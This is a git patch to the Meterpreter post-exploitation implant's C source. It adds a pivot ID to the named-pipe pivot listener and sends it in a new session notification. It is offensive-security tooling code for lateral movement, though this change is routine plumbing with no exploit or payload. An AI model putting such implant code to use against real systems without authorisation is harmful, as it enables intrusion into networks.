From cba5e86ac296d7b4546cfeae3ed60b419a002b45 Mon Sep 17 00:00:00 2001 From: OJ Date: Tue, 11 Jul 2017 19:43:23 +1000 Subject: [PATCH] Add support for the pivot ID --- c/meterpreter/source/common/core.h | 7 ++++--- .../source/server/win/server_pivot_named_pipe.c | 12 ++++++++++-- 2 files changed, 14 insertions(+), 5 deletions(-) diff --git a/c/meterpreter/source/common/core.h b/c/meterpreter/source/common/core.h index c9ed0c66..7690c0e0 100755 --- a/c/meterpreter/source/common/core.h +++ b/c/meterpreter/source/common/core.h @@ -172,9 +172,10 @@ typedef enum TLV_TYPE_ENC_SYM_KEY = TLV_VALUE(TLV_META_TYPE_RAW, 553), ///! Represents and RSA-encrypted symmetric key // Pivots - TLV_TYPE_PIVOT_STAGE_DATA = TLV_VALUE(TLV_META_TYPE_RAW, 650), ///! Represents the data to be staged on new connections. - TLV_TYPE_PIVOT_STAGE_DATA_SIZE = TLV_VALUE(TLV_META_TYPE_UINT, 651), ///! Represents the size of the data to be staged on new connections. - TLV_TYPE_PIVOT_NAMED_PIPE_NAME = TLV_VALUE(TLV_META_TYPE_STRING, 652), ///! Represents named pipe name. + TLV_TYPE_PIVOT_ID = TLV_VALUE(TLV_META_TYPE_RAW, 650), ///! Represents the id of the pivot listener + TLV_TYPE_PIVOT_STAGE_DATA = TLV_VALUE(TLV_META_TYPE_RAW, 651), ///! Represents the data to be staged on new connections. + TLV_TYPE_PIVOT_STAGE_DATA_SIZE = TLV_VALUE(TLV_META_TYPE_UINT, 652), ///! Represents the size of the data to be staged on new connections. + TLV_TYPE_PIVOT_NAMED_PIPE_NAME = TLV_VALUE(TLV_META_TYPE_STRING, 653), ///! Represents named pipe name. TLV_TYPE_EXTENSIONS = TLV_VALUE(TLV_META_TYPE_COMPLEX, 20000), ///! Represents an extension value. TLV_TYPE_USER = TLV_VALUE(TLV_META_TYPE_COMPLEX, 40000), ///! Represents a user value. diff --git a/c/meterpreter/source/server/win/server_pivot_named_pipe.c b/c/meterpreter/source/server/win/server_pivot_named_pipe.c index 1a9ec1da..1320951a 100755 --- a/c/meterpreter/source/server/win/server_pivot_named_pipe.c +++ b/c/meterpreter/source/server/win/server_pivot_named_pipe.c @@ -15,6 +15,7 @@ typedef struct _NamedPipeContext OVERLAPPED read_overlap; OVERLAPPED write_overlap; char name[PIPE_NAME_SIZE]; + GUID pivot_id; Remote* remote; HANDLE pipe; BOOL connecting; @@ -466,8 +467,9 @@ static DWORD server_notify(Remote* remote, LPVOID entryContext, LPVOID threadCon guid.Data2 = htons(guid.Data2); guid.Data3 = htons(guid.Data3); - Packet* notification = packet_create(PACKET_TLV_TYPE_REQUEST, "core_pivot_new"); - packet_add_tlv_raw(notification, TLV_TYPE_SESSION_GUID, (LPVOID)&guid, sizeof(GUID)); + Packet* notification = packet_create(PACKET_TLV_TYPE_REQUEST, "core_pivot_session_new"); + packet_add_tlv_raw(notification, TLV_TYPE_SESSION_GUID, (LPVOID)&guid, sizeof(guid)); + packet_add_tlv_raw(notification, TLV_TYPE_PIVOT_ID, (LPVOID)&serverCtx->pivot_id, sizeof(serverCtx->pivot_id)); packet_transmit(serverCtx->remote, notification, NULL); PivotContext* pivotContext = (PivotContext*)calloc(1, sizeof(PivotContext)); @@ -554,6 +556,12 @@ DWORD request_core_pivot_add_named_pipe(Remote* remote, Packet* packet) namedPipeServer = "."; } + LPBYTE pivotId = packet_get_tlv_value_raw(packet, TLV_TYPE_PIVOT_ID); + if (pivotId != NULL) + { + memcpy(&ctx->pivot_id, pivotId, sizeof(ctx->pivot_id)); + } + LPVOID stageData = packet_get_tlv_value_raw(packet, TLV_TYPE_PIVOT_STAGE_DATA); ctx->stage_data_size = packet_get_tlv_value_uint(packet, TLV_TYPE_PIVOT_STAGE_DATA_SIZE);